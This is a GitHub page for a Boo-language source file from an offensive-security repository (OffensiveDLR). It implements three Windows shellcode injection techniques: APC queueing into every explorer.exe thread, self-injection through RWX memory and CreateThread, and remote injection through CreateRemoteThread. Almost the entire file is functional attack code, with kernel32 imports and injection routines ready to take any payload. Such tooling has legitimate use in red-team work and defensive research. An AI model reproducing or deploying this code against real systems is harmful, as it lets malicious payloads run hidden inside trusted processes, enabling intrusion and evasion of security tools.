forked from byt3bl33d3r/OffensiveDLR
-
Notifications
You must be signed in to change notification settings - Fork 0
/
shellcode.boo
executable file
·144 lines (109 loc) · 5.8 KB
/
shellcode.boo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
import System.Runtime.InteropServices
from System.Diagnostics import Process
from System import IntPtr
/*
Author: Marcello Salvati (@byt3bl33d3r)
License: BSD 3-Clause
This Boolang source file can be run directly with the booi.exe interpreter or using the embedded compiler in runBoo.cs/Invoke-JumpScare.ps1
References:
- https://github.com/boo-lang/boo/wiki/Scripting-with-the-Boo.Lang.Compiler-API
- https://github.com/boo-lang/boo/wiki/Invoke-Native-Methods-with-DllImport
- https://github.com/pwndizzle/c-sharp-memory-injection
*/
class Inject:
[DllImport("kernel32.dll")]
def OpenProcess(dwDesiredAccess as int, bInheritHandle as bool, dwProcessID as int) as int:
pass
[DllImport("kernel32.dll")]
def VirtualAllocEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as int:
pass
[DllImport("kernel32.dll")]
def VirtualProtectEx(hProcess as int, lpAddress as int, dwSize as int, flNewProtect as uint, lpflOldProtect as uint) as bool:
pass
[DllImport("kernel32.dll")]
def WriteProcessMemory(hProcess as int, lpBaseAddress as int, lpBuffer as (byte), nSize as int, lpNumberOfBytesWritten as int) as bool:
pass
[DllImport("kernel32.dll")]
def OpenThread(dwDesiredAccess as int, bInheritHandle as bool, dwThreadId as int) as int:
pass
[DllImport("kernel32.dll")]
def QueueUserAPC(pfnAPC as int, hThread as int, dwData as int) as int:
pass
[DllImport("kernel32.dll")]
def VirtualAlloc(lpStartAddr as int, size as int, flAllocationType as uint, flProtect as uint) as int:
pass
[DllImport("kernel32.dll")]
def CreateThread(lpThreadAttributes as int, dwStackSize as int, lpStartAddress as int, param as int, dwCreationFlags as int, lpThreadId as int) as int:
pass
[DllImport("kernel32.dll")]
def CreateRemoteThread(hProcess as int, lpThreadAttributes as int, dwStackSize as uint, lpStartAddress as int, lpParameter as int, dwCreationFlags as uint, lpThreadId as int) as int:
pass
[DllImport("kernel32.dll")]
def WaitForSingleObject(hHandle as int, dwMilliseconds as long):
pass
public static def InjectQueueUserAPC(sc as (byte)):
# Process Privileges
PROCESS_VM_OPERATION = 0x0008 cast int
PROCESS_VM_WRITE = 0x0020 cast int
PROCESS_VM_READ = 0x0010 cast int
# Memory Permissions
MEM_COMMIT = 0x1000 cast uint
PAGE_EXECUTE_READWRITE = 0x40 cast uint
PAGE_EXECUTE_READ = 0x20 cast uint
# Thread Permissions
SUSPEND_RESUME = (0x0002) cast int
GET_CONTEXT = (0x0008) cast int
SET_CONTEXT = (0x0010) cast int
THREAD_HIJACK = SUSPEND_RESUME | GET_CONTEXT | SET_CONTEXT
targetProcess = Process.GetProcessesByName("explorer")[0]
procHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, false, targetProcess.Id)
print "procHandle = $procHandle"
resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
print "resultPtr = $resultPtr"
bytesWritten as int = 0;
resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"
oldProtect as uint = 0
resultBool = VirtualProtectEx(procHandle cast IntPtr, resultPtr cast IntPtr, sc.Length, PAGE_EXECUTE_READ, oldProtect)
print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"
for thread in targetProcess.Threads:
tHandle = OpenThread(THREAD_HIJACK, false, thread.Id cast int)
print "tHandle = $tHandle"
ptr = QueueUserAPC(resultPtr cast IntPtr, tHandle, 0)
print "QueueUserAPC = $ptr"
print "Injected"
public static def InjectSelf(sc as (byte)):
MEM_COMMIT = 0x1000 cast uint
PAGE_EXECUTE_READWRITE = 0x40 cast uint
currentProcess = Process.GetCurrentProcess()
threadId = 0
pinfo = 0
funcAddr = VirtualAlloc(0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
print "funcAddr = $funcAddr"
Marshal.Copy(sc, 0 , funcAddr cast IntPtr, sc.Length)
//oldProtect as uint = 0
//resultBool = VirtualProtectEx(currentProcess.Handle cast IntPtr, funcAddr cast IntPtr, sc.Length, PAGE_EXECUTE_READWRITE, oldProtect)
//print "VirtualProtectEx = $resultBool, oldProtect = $oldProtect"
hThread = CreateThread(0, 0, funcAddr, pinfo, 0 ,threadId)
print "hThread = $hThread"
WaitForSingleObject(hThread, 0xFFFFFFFF)
print "Injected"
public static def InjectRemote(sc as (byte)):
# Process Privileges
PROCESS_VM_OPERATION = 0x0008 cast int
PROCESS_VM_WRITE = 0x0020 cast int
PROCESS_VM_READ = 0x0010 cast int
PROCESS_ALL = 0x1F0FFF cast int
# Memory Permissions
MEM_COMMIT = 0x1000 cast uint
PAGE_EXECUTE_READWRITE = 0x40 cast uint
targetProcess = Process.GetProcessesByName("explorer")[0]
procHandle = OpenProcess(PROCESS_ALL, false, targetProcess.Id)
print "procHandle = $procHandle"
resultPtr = VirtualAllocEx(procHandle cast IntPtr, 0, sc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
print "resultPtr = $resultPtr"
bytesWritten as int = 0;
resultBool = WriteProcessMemory(procHandle cast IntPtr, resultPtr cast IntPtr, sc, sc.Length, bytesWritten)
print "WriteProcessMemory = $resultBool, bytesWritten = $bytesWritten"
CreateRemoteThread(procHandle cast IntPtr, 0, 0, resultPtr cast IntPtr, 0, 0, 0)
print "Injected"